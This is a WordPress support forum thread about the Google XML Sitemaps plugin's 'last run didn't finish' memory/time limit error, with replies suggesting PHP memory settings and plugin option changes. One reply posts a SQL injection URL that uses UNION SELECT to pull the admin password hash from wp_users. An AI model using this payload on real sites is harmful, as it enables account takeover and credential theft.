• Hello,

    I keep getting the message “The last run didn’t finish! Maybe you can raise the memory or time limit for PHP scripts.”
    I talked to support at my web hosting company (Hostgator) and he said that to change the time or memory limit I would have to get a dedicated server. He tried changing the memory limit anyway to the max which was 64M and I tried to rebuild it and got the same message. I tried writing it as a gzipped file (.gz) and got the same message. My website is tiny with only 2 posts so far and 2 other pages. I have no idea what the issue is but I would really appreciate some help! I didn’t know building a sitemap with the generator would be this difficult.I can tell you the exact settings I used also if that helps.

    Thank you very much,
    Kevin

    http://wordpress.org/extend/plugins/google-sitemap-generator/

Viewing 6 replies - 1 through 6 (of 6 total)
  • You can try and increase PHP memory yourself using one of the methods below. In your root .htaccess file, add this line:

    php_value memory_limit 64M

    Or, in your wp-config.php file, try this:

    define('WP_MEMORY_LIMIT', '64M');

    My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:

    If this aint your problem try increasing your memory or learn .htacces
    If it is look, down here now.

    GO TO YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php

    Now scroll a bit down and uncheck this: Enable sitemap integration

    Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is

    /wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),
    666,CHAR(58))+FROM+wp_users+where+id=1/*

    The sitemap plugin has nothing to do with the SQL injection since it is not active on the frontend.

    I’ve the same:

    # The last run didn’t finish! Maybe you can raise the memory or time limit for PHP scripts. Learn more
    # The last known memory usage of the script was 12.5MB, the limit of your server is 32M.
    # The last known execution time of the script was 0.07 seconds, the limit of your server is 30 seconds.
    # The script stopped around post number 103 (+/- 100)

    (don’t have Global Translator Plugin)

    Problem is solved: I just had to enable: “Enable MySQL standard mode. Use this only if you’re getting MySQL errors. (Needs much more memory!)”

    @bootje

    AWESOME !! now,i can fix it.THX YOU

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘[Plugin: Google XML Sitemaps] Memory/Time Limit Issue’ is closed to new replies.